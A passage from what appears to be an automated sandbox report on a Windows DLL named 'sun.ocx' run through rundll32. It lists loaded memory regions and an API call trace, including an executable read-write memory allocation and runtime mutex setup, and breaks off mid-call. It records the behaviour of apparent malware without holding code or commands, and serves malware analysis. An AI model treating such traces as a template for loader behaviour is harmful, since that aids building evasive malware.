(normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1642 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1643 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1644 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1645 start_va = 0x280000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1646 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1647 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1648 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1649 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1650 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1651 start_va = 0x170000 end_va = 0x1d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1652 start_va = 0x72950000 end_va = 0x72b04fff monitored = 0 entry_point = 0x72a43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 1653 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1654 start_va = 0x72c50000 end_va = 0x72cb4fff monitored = 0 entry_point = 0x72c6fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 1655 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1656 start_va = 0x72b80000 end_va = 0x72c4afff monitored = 0 entry_point = 0x72b96a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 1657 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1658 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1659 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1660 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1661 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1662 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1663 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1664 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1665 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1666 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1667 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1668 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1669 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1670 start_va = 0x72b60000 end_va = 0x72b76fff monitored = 0 entry_point = 0x72b61c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1671 start_va = 0x743a0000 end_va = 0x743aafff monitored = 0 entry_point = 0x743a1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1672 start_va = 0x775b0000 end_va = 0x775d9fff monitored = 0 entry_point = 0x775b12fa region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1673 start_va = 0x410000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1674 start_va = 0x410000 end_va = 0x597fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1675 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1676 start_va = 0x80000 end_va = 0x9dfff monitored = 0 entry_point = 0x9158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1677 start_va = 0x80000 end_va = 0x9dfff monitored = 0 entry_point = 0x9158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1678 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1679 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1680 start_va = 0x80000 end_va = 0x80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1681 start_va = 0x600000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1682 start_va = 0x790000 end_va = 0x1b8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1683 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1684 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1685 start_va = 0x73340000 end_va = 0x73342fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1686 start_va = 0x1b90000 end_va = 0x1e5efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1687 start_va = 0x110000 end_va = 0x110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1688 start_va = 0x120000 end_va = 0x126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1689 start_va = 0x110000 end_va = 0x110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1690 start_va = 0x120000 end_va = 0x126fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1691 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1692 start_va = 0x120000 end_va = 0x12dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1693 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 1694 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1695 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1696 start_va = 0x280000 end_va = 0x2e7fff monitored = 1 entry_point = 0x281470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1697 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1698 start_va = 0x280000 end_va = 0x2e7fff monitored = 1 entry_point = 0x281470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1699 start_va = 0x280000 end_va = 0x2e7fff monitored = 1 entry_point = 0x281470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1700 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1701 start_va = 0x6ab00000 end_va = 0x6ab5ffff monitored = 1 entry_point = 0x6ab01470 region_type = mapped_file name = "sun.ocx" filename = "\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx") Region: id = 1702 start_va = 0x1f60000 end_va = 0x7ebefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1749 start_va = 0x280000 end_va = 0x2a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1750 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1751 start_va = 0x1f60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1752 start_va = 0x10000000 end_va = 0x10026fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 1753 start_va = 0x2b0000 end_va = 0x2bafff monitored = 0 entry_point = 0x2b178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Thread: id = 90 os_tid = 0xde0 [0120.992] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f494 | out: lpSystemTimeAsFileTime=0x16f494*(dwLowDateTime=0x84b491e0, dwHighDateTime=0x1d806e7)) [0120.992] GetCurrentProcessId () returned 0xddc [0120.992] GetCurrentThreadId () returned 0xde0 [0120.993] GetTickCount () returned 0x1b3de7a [0120.993] QueryPerformanceCounter (in: lpPerformanceCount=0x16f49c | out: lpPerformanceCount=0x16f49c*=2870961791235) returned 1 [0120.993] malloc (_Size=0x80) returned 0x5f27b0 [0120.993] __dllonexit () returned 0x6ab0c6c0 [0120.993] malloc (_Size=0x5f5e100) returned 0x1f60020 [0138.499] atoi (_Str="8192") returned 8192 [0138.499] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x280000 [0138.508] malloc (_Size=0x3afd) returned 0x5f40b8 [0138.508] malloc (_Size=0x3afd) returned 0x5f7bc0 [0138.519] strlen (_Str="use_fc_key") returned 0xa [0138.519] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x138 [0138.519] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0138.519] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.519] malloc (_Size=0x4) returned 0x5f1448 [0138.519] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAaAAAAAaaaAaAaaaAaaAaa") returned 0xc000 [0138.520] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x16f2b0, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAaAAAAAaaaAaAaaaAaaAaa") returned 0x3a [0138.520] ReleaseMutex (hMutex=0x138) returned 1 [0138.520] CloseHandle (hObject=0x138) returned 1 [0138.520] strlen (_Str="sjlj_once") returned 0x9 [0138.520] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x138 [0138.520] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0138.520] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.521] malloc (_Size=0x4) returned 0x5f1458 [0138.521] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAaAAAAAaaaAaAaaaAaAAaa") returned 0xc001 [0138.521] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x16f290, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAaAAAAAaaaAaAaaaAaAAaa") returned 0x39 [0138.521] ReleaseMutex (hMutex=0x138) returned 1 [0138.521] CloseHandle (hObject=0x138) returned 1 [0138.521] strlen (_Str="once_global_shmem") returned 0x11 [0138.521] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x138 [0138.521] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0138.521] FindAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.521] malloc (_Size=0x10) returned 0x5f1468 [0138.521] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAaAAAAAaaaAaAaaaAAaAaa") returned 0xc002 [0138.521] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x16f220, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAaAAAAAaaaAaAaaaAAaAa") returned 0x40 [0138.521] ReleaseMutex (hMutex=0x138) returned 1 [0138.521] CloseHandle (hObject=0x138) returned 1 [0138.521] strlen (_Str="once_obj_shmem") returned 0xe [0138.521] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x138 [0138.521] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0138.522] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.522] malloc (_Size=0x4) returned 0x5f1480 [0138.522] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAaAAAAAaaaAaAaaAaaaaaa") returned 0xc003 [0138.522] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x16f230, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAaAAAAAaaaAaAaaAaaaaa") returned 0x3d [0138.522] ReleaseMutex (hMutex=0x138) returned 1 [0138.522] CloseHandle (hObject=0x138) returned 1 [0138.522] calloc (_Count=0x1, _Size=0x10) returned 0x5f1490 [0138.522] strlen (_Str="mutex_global_shmem") returned 0x12 [0138.522] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x138 [0138.522] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0138.522] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.522] malloc (_Size=0x10) returned 0x5f2838 [0138.522] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaaaAAAaa") returned 0xc004 [0138.522] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x16f1d0, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaaaAAAa") returned 0x41 [0138.522] ReleaseMutex (hMutex=0x138) returned 1 [0138.522] CloseHandle (hObject=0x138) returned 1 [0138.522] calloc (_Count=0x1, _Size=0x1c) returned 0x5f2850 [0138.522] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x138 [0138.522] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0138.523] GetCurrentThreadId () returned 0xde0 [0138.523] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0138.523] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x134 [0138.523] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0138.523] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.523] malloc (_Size=0x4) returned 0x5f2878 [0138.523] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaaAAAAaa") returned 0xc005 [0138.523] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x16f1f0, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaaAAAAa") returned 0x46 [0138.523] ReleaseMutex (hMutex=0x134) returned 1 [0138.523] CloseHandle (hObject=0x134) returned 1 [0138.523] calloc (_Count=0x1, _Size=0x10) returned 0x5f2888 [0138.523] calloc (_Count=0x1, _Size=0x1c) returned 0x5f28a0 [0138.523] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0138.523] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0138.523] GetCurrentThreadId () returned 0xde0 [0138.523] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0138.523] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x13c [0138.523] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0138.523] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.523] malloc (_Size=0x4) returned 0x5f28c8 [0138.523] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAAaaAaa") returned 0xc006 [0138.523] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x16f1b0, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAAaaAa") returned 0x41 [0138.524] ReleaseMutex (hMutex=0x13c) returned 1 [0138.524] CloseHandle (hObject=0x13c) returned 1 [0138.524] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0138.524] CloseHandle (hObject=0x134) returned 1 [0138.524] free (_Block=0x5f28a0) [0138.524] free (_Block=0x5f2888) [0138.524] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0138.524] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x134 [0138.524] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0138.524] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.524] malloc (_Size=0x4) returned 0x5f2888 [0138.524] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAaaaAaa") returned 0xc007 [0138.524] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x16f1d0, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAaaaAa") returned 0x44 [0138.524] ReleaseMutex (hMutex=0x134) returned 1 [0138.524] CloseHandle (hObject=0x134) returned 1 [0138.524] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0138.524] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x134 [0138.525] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0138.525] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.525] malloc (_Size=0x10) returned 0x5f2898 [0138.525] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAaaAAaa") returned 0xc008 [0138.525] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x16f160, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAaaAAa") returned 0x48 [0138.525] ReleaseMutex (hMutex=0x134) returned 1 [0138.525] CloseHandle (hObject=0x134) returned 1 [0138.525] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0138.525] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x134 [0138.525] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0138.525] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.525] malloc (_Size=0x4) returned 0x5f28b0 [0138.525] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAaAAaaa") returned 0xc009 [0138.525] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x16f160, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAaAAAAAaaAaAaaaAaAAaa") returned 0x45 [0138.525] ReleaseMutex (hMutex=0x134) returned 1 [0138.525] CloseHandle (hObject=0x134) returned 1 [0138.525] calloc (_Count=0x1, _Size=0x1c) returned 0x5f28d8 [0138.525] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0138.525] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0138.525] GetCurrentThreadId () returned 0xde0 [0138.525] strlen (_Str="pthr_root_shmem") returned 0xf [0138.525] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x13c [0138.526] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0138.526] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.526] malloc (_Size=0x4) returned 0x5f2900 [0138.526] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAaAAAAAaaAaAaaAaaaaaaa") returned 0xc00a [0138.526] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x16f1e0, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAaAAAAAaaAaAaaAaaaaaa") returned 0x3e [0138.526] ReleaseMutex (hMutex=0x13c) returned 1 [0138.526] CloseHandle (hObject=0x13c) returned 1 [0138.526] calloc (_Count=0x1, _Size=0xc0) returned 0x5f2910 [0138.526] strlen (_Str="idListCnt_shmem") returned 0xf [0138.526] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x13c [0138.526] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0138.526] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.526] malloc (_Size=0x4) returned 0x5f29d8 [0138.526] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAaAAAAAaaAaAaaAAAaAAaa") returned 0xc00b [0138.526] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x16f1b0, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAaAAAAAaaAaAaaAAAaAAa") returned 0x3e [0138.526] ReleaseMutex (hMutex=0x13c) returned 1 [0138.526] CloseHandle (hObject=0x13c) returned 1 [0138.526] strlen (_Str="idListMax_shmem") returned 0xf [0138.526] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x13c [0138.526] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0138.526] FindAtomA 